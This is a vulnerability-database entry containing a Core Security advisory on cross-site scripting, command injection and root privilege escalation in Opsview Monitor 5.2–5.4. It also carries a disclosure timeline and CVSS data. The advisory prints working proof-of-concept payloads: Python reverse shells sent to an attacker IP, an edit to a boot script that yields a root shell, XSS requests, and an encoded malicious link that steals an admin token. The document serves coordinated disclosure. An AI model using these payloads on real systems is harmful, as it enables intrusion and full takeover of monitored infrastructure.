id | grep "uid=0(" >/dev/null if [ $? = 0 ] ; then su - opsview -c "$DAEMON $@" else exec $DAEMON $@ fi -----/
The file '/opt/opsview/jasper/bin/db_jasper', which is invoked by the vulnerable script, can be edited by the nagios user which belongs to the 'opsview' group.
/----- ls -ltr /opt/opsview/jasper/bin/db_jasper -rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017 /opt/opsview/jasper/bin/db_jasper nagios@image-builder-299:/home/admin$ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Since 'db_jasper' receives 'db_exists' as an argument, which is later used in a case statement, an attacker could edit that specific part of the script in order to execute arbitrary code once the appliance is rebooted.
The following excerpt shows the attacker's bash script which, after execution, will trigger a reverse shell with root privileges:
/----- while [ "x$1" != "x" ] ; do case "$1" in db_export) db_export ;; db_export_test) db_export_test ;; db_export_initial) TEST=1 db_backup ;; db_import) db_import ;; db_install) db_install ;; db_backup) db_backup ;; db_restore) db_restore ;; db_exists) python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & db_exists exit $? ;; db_upgrade) db_upgrade exit $? ;; *) die "Usage: $0 {db_export|db_import|db_install|db_backup|db_restore}" ;;
esac
shift
done -----/
/----- $nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 45566)
id
uid=0(root) gid=0(root) groups=0(root) -----/
- Report Timeline
2018-05-03: Core Security sent an initial notification to Opsview, asking for GPG keys in order to send draft advisory. 2018-05-04: Opsview replied attaching its GPG keys. 2018-05-04: Core Security sent the encrypted draft advisory. 2018-05-04: Opsview confirmed the reception of the advisory and informed an initial response would be ready by May 11th. 2018-05-11: Opsview replied saying they were able to reproduce all of the reported vulnerabilities and confirmed that they were present in all supported versions of Opsview Monitor (5.4, 5.3 and 5.2). In addition, Opsview informed that were planning to release a fix for these versions by the end of July. 2018-05-11: Core Security thanked the confirmation. 2018-06-25: Opsview informed that they were planning to release a major update for the product (6.0) at the end of July. This update will address all reported vulnerabilities. Also, they informed that the previous versions of the product would be fixed by the end of August. 2018-06-27: Core Security thanked the status update and asked for a tentative public disclosure date. 2018-07-16: Core Security requested a status update. 2018-07-18: Opsview proposed to set a tentative publication date by the end of August when they release the fixes for its earlier versions. 2018-07-18: Core Security agreed with the Opsview's proposal. 2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0 release will be available on July 25th. In addition, they informed that they didn't have the exact release date for the updates to previous versions of the product. 2018-08-06: Core Security requested a status update for the remaining fixes. 2018-08-13: Opsview replied saying that they were targeting the week of August 24th for release the fixes of their earlier product versions and they would confirm the exact date at the end of the next week. 2018-08-13: Core Security thanked the reply. 2018-08-24: Opsview informed Core Security that the remaining fixed versions will be available on August 29th. 2018-08-24: Core Security thanked the update and proposed September 4th as the coordinated release date. 2018-08-28: Opsview agreed on the proposed release date. 2018-09-04: Advisory CORE-2018-0008 published.
- References
[1] https://www.opsview.com/solutions
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201809-0906",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.3.1"
},
{
"model": "opsview",
"scope": "gte",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.0"
},
{
"model": "opsview",
"scope": "lt",
"trust": 1.0,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "opsview",
"scope": "lt",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.x"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.8,
"vendor": "opsview",
"version": "5.4.2"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.4"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.3"
},
{
"model": "monitor",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "5.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.0"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.3"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4.1"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.2"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.4"
},
{
"model": "opsview",
"scope": "eq",
"trust": 0.6,
"vendor": "opsview",
"version": "4.6.3"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16148"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16148",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-16148",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-17455",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-16148",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16148",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-17455",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-157",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-16148",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. **Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nIn addition, issues presented in 7.3 and 7.4 could allow an attacker to\nobtain command execution on the system as the nagios user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. \nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. \n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. **Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: 